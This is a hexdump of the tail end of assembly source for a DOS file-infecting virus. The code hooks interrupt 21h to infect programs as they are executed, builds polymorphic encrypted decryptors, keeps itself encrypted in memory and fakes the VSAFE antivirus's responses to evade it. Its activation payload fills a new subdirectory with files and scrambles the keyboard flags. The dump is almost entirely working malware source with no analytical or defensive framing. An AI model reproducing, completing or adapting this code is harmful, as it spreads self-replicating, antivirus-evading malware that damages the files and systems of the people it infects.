|00005010| 20 20 30 45 39 68 2c 30 | 2c 30 2c 30 20 20 20 20 | 0E9h,0|,0,0 |
|00005020| 20 20 20 20 20 20 20 20 | 20 20 3b 20 6a 6d 70 20 | | ; jmp |
|00005030| 58 58 58 58 20 2c 30 20 | 28 69 64 29 0a 69 6e 63 |XXXX ,0 |(id).inc|
|00005040| 5f 70 74 72 09 64 77 09 | 30 09 09 09 3b 20 70 74 |_ptr.dw.|0...; pt|
|00005050| 72 20 74 6f 20 6c 6f 63 | 61 74 69 6f 6e 20 6f 66 |r to loc|ation of|
|00005060| 20 49 4e 43 0a 65 6e 63 | 5f 6f 70 5f 70 74 72 20 | INC.enc|_op_ptr |
|00005070| 64 77 09 30 09 09 09 3b | 20 61 63 74 75 61 6c 20 |dw.0...;| actual |
|00005080| 45 4e 43 20 6f 70 20 70 | 74 72 0a 70 74 72 5f 6f |ENC op p|tr.ptr_o|
|00005090| 70 5f 70 74 72 20 64 77 | 09 30 09 09 09 3b 20 70 |p_ptr dw|.0...; p|
|000050a0| 74 72 20 74 6f 20 70 74 | 72 20 73 65 74 20 70 6f |tr to pt|r set po|
|000050b0| 73 0a 63 6f 75 6e 74 5f | 6f 70 5f 70 74 72 20 64 |s.count_|op_ptr d|
|000050c0| 77 09 30 09 09 09 3b 20 | 70 74 72 20 74 6f 20 63 |w.0...; |ptr to c|
|000050d0| 6f 75 6e 74 65 72 20 72 | 65 67 20 70 6f 73 0a 64 |ounter r|eg pos.d|
|000050e0| 65 63 5f 6f 70 5f 70 74 | 72 20 64 77 09 31 09 09 |ec_op_pt|r dw.1..|
|000050f0| 09 3b 20 70 74 72 20 74 | 6f 20 64 65 63 72 65 6d |.; ptr t|o decrem|
|00005100| 65 6e 74 20 63 6f 75 6e | 74 65 72 20 6f 70 20 70 |ent coun|ter op p|
|00005110| 6f 73 0a 61 63 74 69 76 | 61 74 65 20 64 62 09 30 |os.activ|ate db.0|
|00005120| 0a 69 73 61 76 09 64 62 | 09 30 0a 0a 73 65 67 5f |.isav.db|.0..seg_|
|00005130| 6f 70 09 64 62 09 32 45 | 68 09 09 09 3b 20 43 53 |op.db.2E|h...; CS|
|00005140| 0a 77 5f 62 09 64 62 09 | 38 30 68 09 09 09 3b 20 |.w_b.db.|80h...; |
|00005150| 62 79 74 65 3d 38 30 68 | 20 77 6f 72 64 3d 38 31 |byte=80h| word=81|
|00005160| 68 0a 65 6e 63 5f 74 79 | 70 65 20 64 62 09 32 43 |h.enc_ty|pe db.2C|
|00005170| 68 09 09 09 3b 20 53 55 | 42 20 42 59 54 45 20 50 |h...; SU|B BYTE P|
|00005180| 54 52 20 43 53 3a 5b 53 | 49 5d 2c 58 58 58 58 20 |TR CS:[S|I],XXXX |
|00005190| 3b 58 4f 52 2f 33 34 0a | 65 6e 63 5f 6e 75 6d 09 |;XOR/34.|enc_num.|
|000051a0| 64 62 09 30 0a 0a 70 74 | 72 5f 73 65 74 09 64 62 |db.0..pt|r_set.db|
|000051b0| 09 30 42 45 68 09 09 09 | 3b 20 4d 4f 56 20 53 49 |.0BEh...|; MOV SI|
|000051c0| 2c 58 58 58 58 0a 72 65 | 6c 5f 6f 66 66 09 64 77 |,XXXX.re|l_off.dw|
|000051d0| 09 72 65 61 6c 5f 73 74 | 61 72 74 2b 31 30 30 68 |.real_st|art+100h|
|000051e0| 0a 0a 63 6f 75 6e 74 5f | 6f 70 20 64 62 09 30 42 |..count_|op db.0B|
|000051f0| 38 68 09 09 09 3b 20 43 | 58 3a 42 39 20 41 58 3a |8h...; C|X:B9 AX:|
|00005200| 62 38 0a 63 72 79 70 74 | 5f 62 79 74 65 73 20 64 |b8.crypt|_bytes d|
|00005210| 77 20 20 6f 66 66 73 65 | 74 20 76 65 6e 64 2d 6f |w offse|t vend-o|
|00005220| 66 66 73 65 74 20 64 6a | 5f 62 75 66 0a 0a 64 65 |ffset dj|_buf..de|
|00005230| 63 5f 6f 70 3a 09 64 65 | 63 09 61 78 09 09 09 3b |c_op:.de|c.ax...;|
|00005240| 20 44 45 43 20 41 58 7c | 42 58 7c 43 58 7c 44 58 | DEC AX||BX|CX|DX|
|00005250| 0a 6a 6e 7a 5f 6f 70 3a | 09 64 62 09 37 35 68 2c |.jnz_op:|.db.75h,|
|00005260| 6f 72 67 5f 6c 6f 6f 70 | 0a 0a 6e 6f 70 73 3a 20 |org_loop|..nops: |
|00005270| 20 20 6e 6f 70 20 20 20 | 20 20 20 20 20 20 20 20 | nop | |
|00005280| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00005290| 20 20 3b 20 31 20 62 79 | 74 65 20 67 61 72 62 61 | ; 1 by|te garba|
|000052a0| 67 65 20 4f 50 73 2e 2e | 20 6d 75 73 74 20 62 65 |ge OPs..| must be|
|000052b0| 20 31 36 0a 49 46 20 49 | 4e 43 4c 55 44 45 5f 49 | 16.IF I|NCLUDE_I|
|000052c0| 4e 54 33 0a 20 20 20 20 | 20 20 20 20 69 6e 74 20 |NT3. | int |
|000052d0| 20 20 20 20 33 0a 45 4c | 53 45 0a 20 20 20 20 20 | 3.EL|SE. |
|000052e0| 20 20 20 63 6c 64 0a 45 | 4e 44 49 46 0a 09 69 6e | cld.E|NDIF..in|
|000052f0| 74 6f 0a 09 69 6e 63 09 | 62 70 0a 09 64 65 63 09 |to..inc.|bp..dec.|
|00005300| 62 70 0a 09 63 6c 64 0a | 09 6e 6f 70 0a 09 73 74 |bp..cld.|.nop..st|
|00005310| 63 0a 09 63 6d 63 0a 09 | 63 6c 63 0a 09 73 74 63 |c..cmc..|clc..stc|
|00005320| 0a 09 69 6e 74 6f 0a 09 | 63 6c 69 0a 09 73 74 69 |..into..|cli..sti|
|00005330| 0a 09 69 6e 63 09 62 70 | 0a 49 46 20 49 4e 43 4c |..inc.bp|.IF INCL|
|00005340| 55 44 45 5f 49 4e 54 33 | 0a 20 20 20 20 20 20 20 |UDE_INT3|. |
|00005350| 20 69 6e 74 20 20 20 20 | 20 33 0a 45 4c 53 45 0a | int | 3.ELSE.|
|00005360| 20 20 20 20 20 20 20 20 | 6e 6f 70 0a 45 4e 44 49 | |nop.ENDI|
|00005370| 46 0a 0a 0a 3b 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |F...;---|--------|
|00005380| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005390| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000053a0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 0a |--------|-------.|
|000053b0| 3b 20 61 63 74 69 76 61 | 74 69 6f 6e 20 72 6f 75 |; activa|tion rou|
|000053c0| 74 69 6e 65 0a 3b 0a 61 | 63 74 5f 72 6f 75 74 69 |tine.;.a|ct_routi|
|000053d0| 6e 65 3a 0a 09 70 75 73 | 68 09 61 78 20 62 78 20 |ne:..pus|h.ax bx |
|000053e0| 63 78 20 64 73 20 64 78 | 20 62 70 20 65 73 20 63 |cx ds dx| bp es c|
|000053f0| 73 0a 09 70 6f 70 09 64 | 73 0a 09 6d 6f 76 09 61 |s..pop.d|s..mov.a|
|00005400| 63 74 69 76 61 74 65 2c | 30 09 09 3b 77 65 27 72 |ctivate,|0..;we'r|
|00005410| 65 20 69 6e 20 77 6f 72 | 6b 20 6e 6f 77 2e 2e 0a |e in wor|k now...|
|00005420| 09 6c 65 61 09 64 78 2c | 70 69 6e 5f 64 69 72 09 |.lea.dx,|pin_dir.|
|00005430| 09 3b 63 72 65 61 74 65 | 20 6f 75 72 20 73 75 62 |.;create| our sub|
|00005440| 64 69 72 65 63 74 6f 72 | 79 0a 09 6d 6f 76 09 61 |director|y..mov.a|
|00005450| 68 2c 33 39 68 0a 09 69 | 6e 74 09 32 31 68 0a 09 |h,39h..i|nt.21h..|
|00005460| 6d 6f 76 09 61 68 2c 33 | 62 68 09 09 09 3b 63 68 |mov.ah,3|bh...;ch|
|00005470| 61 6e 67 65 20 74 6f 20 | 6f 75 72 20 6e 65 77 20 |ange to |our new |
|00005480| 73 75 62 64 69 72 65 63 | 74 6f 72 79 0a 09 69 6e |subdirec|tory..in|
|00005490| 74 09 32 31 68 0a 0a 09 | 6c 65 61 09 64 78 2c 66 |t.21h...|lea.dx,f|
|000054a0| 69 6c 65 31 09 09 3b 6f | 66 66 73 65 74 20 6f 66 |ile1..;o|ffset of|
|000054b0| 20 66 69 72 73 74 20 66 | 69 6c 65 6e 61 6d 65 0a | first f|ilename.|
|000054c0| 09 6d 6f 76 09 62 70 2c | 6d 73 67 5f 66 69 6c 65 |.mov.bp,|msg_file|
|000054d0| 7a 09 09 3b 23 20 6f 66 | 20 66 69 6c 65 7a 20 74 |z..;# of| filez t|
|000054e0| 6f 74 61 6c 0a 6d 61 6b | 65 5f 6d 73 67 3a 0a 09 |otal.mak|e_msg:..|
|000054f0| 78 6f 72 09 63 78 2c 63 | 78 09 09 09 3b 6e 75 6c |xor.cx,c|x...;nul|
|00005500| 6c 20 61 74 74 72 69 62 | 73 0a 09 6d 6f 76 09 61 |l attrib|s..mov.a|
|00005510| 68 2c 33 63 68 0a 09 69 | 6e 74 09 32 31 68 09 09 |h,3ch..i|nt.21h..|
|00005520| 09 3b 63 72 65 61 74 65 | 20 70 68 69 6c 65 0a 09 |.;create| phile..|
|00005530| 6a 63 09 64 6f 6e 74 5f | 63 6c 6f 73 65 0a 09 78 |jc.dont_|close..x|
|00005540| 63 68 67 09 61 78 2c 62 | 78 0a 09 6d 6f 76 09 61 |chg.ax,b|x..mov.a|
|00005550| 68 2c 33 65 68 09 09 09 | 3b 63 6c 6f 73 65 20 70 |h,3eh...|;close p|
|00005560| 68 69 6c 65 0a 09 69 6e | 74 09 32 31 68 0a 64 6f |hile..in|t.21h.do|
|00005570| 6e 74 5f 63 6c 6f 73 65 | 3a 20 61 64 64 09 64 78 |nt_close|: add.dx|
|00005580| 2c 39 09 09 09 3b 70 6f | 69 6e 74 20 74 6f 20 6e |,9...;po|int to n|
|00005590| 65 78 74 20 70 68 69 6c | 65 0a 09 64 65 63 09 62 |ext phil|e..dec.b|
|000055a0| 70 0a 09 6a 6e 7a 09 6d | 61 6b 65 5f 6d 73 67 0a |p..jnz.m|ake_msg.|
|000055b0| 0a 09 6c 65 61 09 64 78 | 2c 72 6f 6f 74 09 09 09 |..lea.dx|,root...|
|000055c0| 3b 20 63 68 61 6e 67 65 | 20 62 61 63 6b 20 74 6f |; change| back to|
|000055d0| 20 6f 72 67 69 6e 61 6c | 20 64 69 72 0a 09 6d 6f | orginal| dir..mo|
|000055e0| 76 09 61 68 2c 33 62 68 | 0a 09 69 6e 74 09 32 31 |v.ah,3bh|..int.21|
|000055f0| 68 0a 0a 09 63 6d 70 09 | 72 5f 64 65 6c 61 79 2c |h...cmp.|r_delay,|
|00005600| 35 09 09 3b 35 20 63 61 | 6c 6c 73 3f 0a 09 6a 6c |5..;5 ca|lls?..jl|
|00005610| 09 72 5f 6e 6f 09 09 09 | 3b 69 66 20 6e 6f 74 20 |.r_no...|;if not |
|00005620| 74 68 65 6e 20 73 6b 69 | 70 20 6b 65 79 62 6f 61 |then ski|p keyboa|
|00005630| 72 64 20 72 6f 72 0a 09 | 6d 6f 76 09 72 5f 64 65 |rd ror..|mov.r_de|
|00005640| 6c 61 79 2c 2d 31 0a 09 | 78 6f 72 09 61 78 2c 61 |lay,-1..|xor.ax,a|
|00005650| 78 09 09 09 3b 65 73 3d | 6e 75 6c 6c 0a 09 6d 6f |x...;es=|null..mo|
|00005660| 76 09 65 73 2c 61 78 0a | 09 72 6f 72 09 77 6f 72 |v.es,ax.|.ror.wor|
|00005670| 64 20 70 74 72 20 65 73 | 3a 20 5b 34 31 36 68 5d |d ptr es|: [416h]|
|00005680| 2c 31 09 3b 72 6f 74 61 | 74 65 20 6b 65 79 62 6f |,1.;rota|te keybo|
|00005690| 61 72 64 20 66 6c 61 67 | 73 0a 72 5f 6e 6f 3a 0a |ard flag|s.r_no:.|
|000056a0| 09 69 6e 63 09 72 5f 64 | 65 6c 61 79 09 09 09 3b |.inc.r_d|elay...;|
|000056b0| 69 6e 63 72 65 6d 65 6e | 74 20 63 61 6c 6c 73 20 |incremen|t calls |
|000056c0| 63 6f 75 6e 74 0a 09 6d | 6f 76 09 61 63 74 69 76 |count..m|ov.activ|
|000056d0| 61 74 65 2c 31 0a 09 70 | 6f 70 09 65 73 20 62 70 |ate,1..p|op.es bp|
|000056e0| 20 64 78 20 64 73 20 63 | 78 20 62 78 20 61 78 0a | dx ds c|x bx ax.|
|000056f0| 09 6a 6d 70 09 6e 6f 5f | 61 63 74 0a 0a 3b 2d 2d |.jmp.no_|act..;--|
|00005700| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005710| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005720| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005730| 2d 2d 2d 2d 2d 0a 3b 20 | 49 6e 74 65 72 72 75 70 |-----.; |Interrup|
|00005740| 74 20 32 34 68 20 2d 20 | 63 72 69 74 69 63 61 6c |t 24h - |critical|
|00005750| 20 65 72 72 6f 72 20 68 | 61 6e 64 6c 65 72 0a 3b | error h|andler.;|
|00005760| 0a 6e 65 77 5f 32 34 3a | 09 09 09 09 09 3b 20 63 |.new_24:|.....; c|
|00005770| 72 69 74 69 63 61 6c 20 | 65 72 72 6f 72 20 68 61 |ritical |error ha|
|00005780| 6e 64 6c 65 72 0a 09 6d | 6f 76 09 61 6c 2c 33 09 |ndler..m|ov.al,3.|
|00005790| 09 09 3b 20 70 72 6f 6d | 70 74 73 20 73 75 63 6b |..; prom|pts suck|
|000057a0| 2c 20 72 65 74 75 72 6e | 20 66 61 69 6c 0a 09 69 |, return| fail..i|
|000057b0| 72 65 74 0a 0a 3b 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |ret..;--|--------|
|000057c0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000057d0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|000057e0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 0a |--------|-------.|
|000057f0| 3b 20 49 6e 2d 6d 65 6d | 6f 72 79 20 65 6e 63 72 |; In-mem|ory encr|
|00005800| 79 70 74 69 6f 6e 20 66 | 75 6e 63 74 69 6f 6e 0a |yption f|unction.|
|00005810| 3b 20 20 2a 2a 76 69 72 | 75 73 20 65 6e 63 72 79 |; **vir|us encry|
|00005820| 70 74 65 64 20 69 6e 20 | 6d 65 6d 6f 72 79 20 75 |pted in |memory u|
|00005830| 70 20 74 6f 20 74 68 69 | 73 20 70 6f 69 6e 74 2a |p to thi|s point*|
|00005840| 2a 0a 3b 0a 6d 65 6d 5f | 63 72 79 70 74 3a 0a 09 |*.;.mem_|crypt:..|
|00005850| 6d 6f 76 09 63 78 2c 6f | 66 66 73 65 74 20 6d 65 |mov.cx,o|ffset me|
|00005860| 6d 5f 63 72 79 70 74 2d | 6f 66 66 73 65 74 20 63 |m_crypt-|offset c|
|00005870| 6f 64 65 5f 73 74 61 72 | 74 0a 09 78 6f 72 09 64 |ode_star|t..xor.d|
|00005880| 69 2c 64 69 09 09 09 3b | 6f 66 66 73 65 74 20 30 |i,di...;|offset 0|
|00005890| 0a 6d 65 6d 5f 6c 6f 6f | 70 3a 0a 09 64 62 09 32 |.mem_loo|p:..db.2|
|000058a0| 45 68 2c 38 31 68 2c 33 | 35 68 09 09 3b 43 53 3a |Eh,81h,3|5h..;CS:|
|000058b0| 58 4f 52 20 57 4f 52 44 | 20 50 54 52 20 5b 44 49 |XOR WORD| PTR [DI|
|000058c0| 5d 2c 0a 6d 65 6d 5f 77 | 6f 72 64 20 64 77 09 30 |],.mem_w|ord dw.0|
|000058d0| 09 09 09 3b 58 58 58 58 | 0a 09 69 6e 63 09 64 69 |...;XXXX|..inc.di|
|000058e0| 0a 09 6c 6f 6f 70 09 6d | 65 6d 5f 6c 6f 6f 70 0a |..loop.m|em_loop.|
|000058f0| 09 72 65 74 0a 0a 3b 2d | 2d 2d 2d 2d 2d 2d 2d 2d |.ret..;-|--------|
|00005900| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005910| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005920| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00005930| 2d 0a 3b 20 49 6e 74 65 | 72 72 75 70 74 20 32 31 |-.; Inte|rrupt 21|
|00005940| 68 0a 3b 20 20 72 65 74 | 75 72 6e 73 20 53 49 3d |h.; ret|urns SI=|
|00005950| 30 20 61 6e 64 20 70 61 | 73 73 65 73 20 63 6f 6e |0 and pa|sses con|
|00005960| 74 72 6f 6c 20 74 6f 20 | 6e 6f 72 6d 61 6c 20 68 |trol to |normal h|
|00005970| 61 6e 64 6c 65 72 20 69 | 66 0a 3b 20 20 20 56 53 |andler i|f.; VS|
|00005980| 41 46 45 20 75 6e 69 6e | 73 74 61 6c 6c 20 63 6f |AFE unin|stall co|
|00005990| 6d 6d 61 6e 64 20 69 73 | 20 72 65 63 69 65 76 65 |mmand is| recieve|
|000059a0| 64 2e 0a 3b 0a 6e 65 77 | 32 31 3a 0a 09 70 75 73 |d..;.new|21:..pus|
|000059b0| 68 66 0a 0a 09 63 6d 70 | 09 63 73 3a 20 61 63 74 |hf...cmp|.cs: act|
|000059c0| 69 76 61 74 65 2c 31 09 | 09 3b 20 74 69 6d 65 20 |ivate,1.|.; time |
|000059d0| 74 6f 20 61 63 74 69 76 | 61 74 65 3f 0a 09 6a 6e |to activ|ate?..jn|
|000059e0| 7a 09 6e 6f 5f 61 63 74 | 0a 09 63 6d 70 09 61 68 |z.no_act|..cmp.ah|
|000059f0| 2c 30 42 68 0a 09 6a 6c | 09 61 63 74 5f 72 6f 75 |,0Bh..jl|.act_rou|
|00005a00| 74 69 6e 65 0a 6e 6f 5f | 61 63 74 3a 0a 09 63 6d |tine.no_|act:..cm|
|00005a10| 70 09 61 78 2c 73 69 67 | 6e 61 6c 09 09 3b 20 62 |p.ax,sig|nal..; b|
|00005a20| 65 20 69 74 20 75 73 3f | 0a 09 6a 6e 7a 09 6e 6f |e it us?|..jnz.no|
|00005a30| 74 5f 75 73 09 09 09 3b | 20 72 69 63 68 74 69 67 |t_us...;| richtig|
|00005a40| 2e 2e 0a 09 63 6d 70 09 | 64 78 2c 76 73 61 66 65 |....cmp.|dx,vsafe|
|00005a50| 5f 77 6f 72 64 0a 09 6a | 6e 7a 09 6e 6f 74 5f 75 |_word..j|nz.not_u|
|00005a60| 73 0a 09 78 6f 72 09 73 | 69 2c 73 69 09 09 09 3b |s..xor.s|i,si...;|
|00005a70| 20 74 69 73 20 75 73 0a | 09 6d 6f 76 09 64 69 2c | tis us.|.mov.di,|
|00005a80| 34 35 35 39 68 09 09 3b | 20 73 69 6d 75 6c 61 74 |4559h..;| simulat|
|00005a90| 65 20 56 53 41 46 45 20 | 72 65 74 75 72 6e 0a 6e |e VSAFE |return.n|
|00005aa0| 6f 74 5f 75 73 3a 0a 09 | 63 6d 70 09 61 68 2c 34 |ot_us:..|cmp.ah,4|
|00005ab0| 62 68 09 09 09 3b 20 65 | 78 65 63 75 74 65 20 70 |bh...; e|xecute p|
|00005ac0| 68 69 6c 65 3f 0a 09 6a | 6e 7a 09 6a 6d 70 5f 6f |hile?..j|nz.jmp_o|
|00005ad0| 72 67 0a 0a 67 6f 5f 6e | 6f 77 3a 09 70 75 73 68 |rg..go_n|ow:.push|
|00005ae0| 09 61 78 20 62 70 20 62 | 78 20 63 78 20 64 69 20 |.ax bp b|x cx di |
|00005af0| 64 78 20 64 73 20 65 73 | 20 73 69 0a 09 63 61 6c |dx ds es| si..cal|
|00005b00| 6c 09 6d 65 6d 5f 63 72 | 79 70 74 09 09 3b 20 64 |l.mem_cr|ypt..; d|
|00005b10| 65 63 72 79 70 74 20 69 | 6e 20 6d 65 6d 6f 72 79 |ecrypt i|n memory|
|00005b20| 0a 09 63 61 6c 6c 09 69 | 6e 66 65 63 74 5f 66 69 |..call.i|nfect_fi|
|00005b30| 6c 65 09 09 3b 20 74 68 | 65 20 6d 6f 74 68 65 72 |le..; th|e mother|
|00005b40| 20 6f 66 20 61 6c 6c 20 | 63 61 6c 6c 73 0a 09 63 | of all |calls..c|
|00005b50| 61 6c 6c 09 6d 65 6d 5f | 63 72 79 70 74 09 09 3b |all.mem_|crypt..;|
|00005b60| 20 65 6e 63 72 79 70 74 | 20 69 6e 20 6d 65 6d 6f | encrypt| in memo|
|00005b70| 72 79 0a 09 70 6f 70 09 | 73 69 20 65 73 20 64 73 |ry..pop.|si es ds|
|00005b80| 20 64 78 20 64 69 20 63 | 78 20 62 78 20 62 70 20 | dx di c|x bx bp |
|00005b90| 61 78 0a 0a 09 6a 6d 70 | 5f 6f 72 67 3a 0a 09 70 |ax...jmp|_org:..p|
|00005ba0| 6f 70 66 0a 09 64 62 09 | 30 65 61 68 09 09 09 3b |opf..db.|0eah...;|
|00005bb0| 20 6a 75 6d 70 20 66 61 | 72 0a 09 6f 6c 64 32 31 | jump fa|r..old21|
|00005bc0| 09 64 64 20 30 09 09 09 | 3b 20 4f 3a 53 0a 0a 0a |.dd 0...|; O:S...|
|00005bd0| 65 78 65 5f 68 65 61 64 | 65 72 3a 0a 6f 72 67 5f |exe_head|er:.org_|
|00005be0| 62 79 74 65 73 20 64 62 | 09 30 43 44 68 2c 32 30 |bytes db|.0CDh,20|
|00005bf0| 68 2c 30 2c 30 09 09 3b | 20 6f 72 69 67 69 6e 61 |h,0,0..;| origina|
|00005c00| 6c 20 43 4f 4d 20 62 79 | 74 65 73 20 7c 20 65 78 |l COM by|tes | ex|
|00005c10| 65 20 68 64 72 0a 3b 2d | 2d 2d 2d 20 53 74 61 72 |e hdr.;-|--- Star|
|00005c20| 74 20 6f 66 20 68 65 61 | 70 20 28 6e 6f 74 20 77 |t of hea|p (not w|
|00005c30| 72 69 74 74 65 6e 20 74 | 6f 20 64 69 73 6b 29 0a |ritten t|o disk).|
|00005c40| 68 65 61 70 3a 0a 64 62 | 09 31 34 68 09 64 75 70 |heap:.db|.14h.dup|
|00005c50| 28 30 29 09 09 09 3b 20 | 72 65 6d 61 69 6e 69 6e |(0)...; |remainin|
|00005c60| 67 20 65 78 65 20 68 65 | 61 64 65 72 20 73 70 61 |g exe he|ader spa|
|00005c70| 63 65 0a 6f 6c 64 5f 32 | 34 5f 6f 66 66 20 64 77 |ce.old_2|4_off dw|
|00005c80| 09 30 09 09 09 3b 20 6f | 6c 64 20 69 6e 74 32 34 |.0...; o|ld int24|
|00005c90| 68 20 76 65 63 74 6f 72 | 0a 6f 6c 64 5f 32 34 5f |h vector|.old_24_|
|00005ca0| 73 65 67 20 64 77 09 30 | 0a 72 5f 64 65 6c 61 79 |seg dw.0|.r_delay|
|00005cb0| 09 64 62 09 30 0a 73 69 | 7a 65 5f 64 69 73 70 20 |.db.0.si|ze_disp |
|00005cc0| 64 62 09 30 09 09 09 3b | 20 61 64 64 69 74 69 6f |db.0...;| additio|
|00005cd0| 6e 61 6c 20 73 69 7a 65 | 20 6f 66 20 76 69 72 75 |nal size| of viru|
|00005ce0| 73 0a 49 46 20 58 54 52 | 41 5f 53 50 41 43 45 0a |s.IF XTR|A_SPACE.|
|00005cf0| 64 62 20 20 20 20 20 20 | 30 44 44 68 20 20 20 20 |db |0DDh |
|00005d00| 64 75 70 28 30 29 20 20 | 20 20 20 20 20 20 20 20 |dup(0) | |
|00005d10| 20 20 20 20 20 20 20 20 | 3b 20 78 74 72 61 20 73 | |; xtra s|
|00005d20| 70 61 63 65 20 66 6f 72 | 20 72 61 6e 64 6f 6d 20 |pace for| random |
|00005d30| 77 72 69 74 65 0a 09 09 | 09 09 09 3b 20 6f 74 68 |write...|...; oth|
|00005d40| 65 72 77 69 73 65 20 64 | 65 63 72 79 70 74 6f 72 |erwise d|ecryptor|
|00005d50| 20 77 69 6c 6c 20 62 65 | 0a 09 09 09 09 09 3b 20 | will be|......; |
|00005d60| 77 72 69 74 74 65 6e 20 | 74 77 69 63 65 20 2d 20 |written |twice - |
|00005d70| 63 6f 75 6c 64 20 6d 61 | 6b 65 20 69 74 0a 09 09 |could ma|ke it...|
|00005d80| 09 09 09 3b 20 76 75 6c | 6e 65 72 61 62 6c 65 0a |...; vul|nerable.|
|00005d90| 45 4e 44 49 46 0a 76 65 | 6e 64 3a 09 09 09 09 09 |ENDIF.ve|nd:.....|
|00005da0| 3b 20 65 6e 64 20 6f 66 | 20 76 69 72 75 73 20 69 |; end of| virus i|
|00005db0| 6e 20 6d 65 6d 6f 72 79 | 2e 2e 0a 63 73 65 67 09 |n memory|...cseg.|
|00005dc0| 65 6e 64 73 0a 09 65 6e | 64 09 73 74 61 72 74 0a |ends..en|d.start.|
|00005dd0| 0a 0a | |.. | |
+--------+-------------------------+-------------------------+--------+--------+
